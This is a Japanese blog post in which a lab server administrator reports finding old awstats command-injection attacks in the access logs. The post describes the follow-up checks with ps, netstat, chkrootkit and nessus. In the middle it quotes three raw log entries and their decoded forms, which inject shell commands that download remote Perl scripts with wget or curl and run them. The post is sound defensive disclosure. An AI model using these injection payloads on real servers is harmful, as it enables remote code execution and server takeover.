研究室サーバに入れているawstatsというアクセスログ解析ソフトには，古いバージョンに脆弱性が見つかっている（セキュリティホールmemo）．すでにバージョンアップしたので大丈夫なのだが，ひょっとしてバージョンアップする前に攻撃を受けていたのではないかと心配になって調べてみたら，見事に食らっていた．参考のため，晒しておく．

144.230.99.109 - - [20/Feb/2005:05:54:49 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|%20echo;%20echo;%20cd%20/tmp;wget%20frag.pro.br/deadcow/xw;perl%20/var/tmp/.xw;%20echo;%20echo;%20| HTTP/1.0" 200 108809 "-" "Mozilla/4.0"
lab-1002.fas.harvard.edu - - [25/Feb/2005:01:39:01 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|%20echo;%20echo;%20cd%20/var/tmp/.X11;wget%20www.ownz.go.ro/socket;perl%20/var/tmp/.X11/socket;;%20echo;%20echo;%20| HTTP/1.0" 200 110431 "-" "Mozilla/4.0"
200-155-12-102.bitsell.com.br - - [06/Mar/2005:01:24:43 +0900] "GET /cgi-bin/awstats/awstats.pl?update=1&logfile=%7Cecho%20;cd%20/tmp;curl%20-O%20www.krazyk9s.co.uk/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids.txt;%20wget%20www.krazyk9s.co.uk/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids.txt;echo%20;echo%7C HTTP/1.1" 200 2456 "-" "LWP::Simple/5.65"

これでは分かりにくいので，urlencodeされているのを元に戻すと，次のようになる．

echo; echo; cd /tmp;wget frag.pro.br/deadcow/xw;perl /var/tmp/.xw; echo; echo;

echo; echo; cd /var/tmp/.X11;wget www.ownz.go.ro/socket;perl /var/tmp/.X11/socket;; echo; echo;

echo ;cd /tmp;curl -O www.krazyk9s.co.uk/spykids.txt ;perl spykids.txt ;rm -rf spykids.txt; wget www.krazyk9s.co.uk/spykids.txt; perl spykids.txt; rm -rf spykids.txt;echo ;echo

なお，バージョンアップをした日付を記録していなかったこともあり，攻撃が成功したかどうかは不明である．/tmpや/var/tmpにあやしいファイルはないか，psしてあやしいプロセスはないか，netstatしてあやしいポートはあいていないか，chkrootkitでrootkitにやられていないかをチェックしたが，何も見つからなかった．しかし，rootkitが仕掛けられていたら侵入の形跡は消されていると考えられるし（参考記事），chkrootkitの検出能力にも限界があると思われるので，本当に侵入されていないのか不安が残る．
あと一つの手段として，外部からポートスキャンして開いているポートがないかどうかを調べる方法がある．そこで，別のサーバにnessusを入れてスキャンしたが，特に問題はなさそうであった．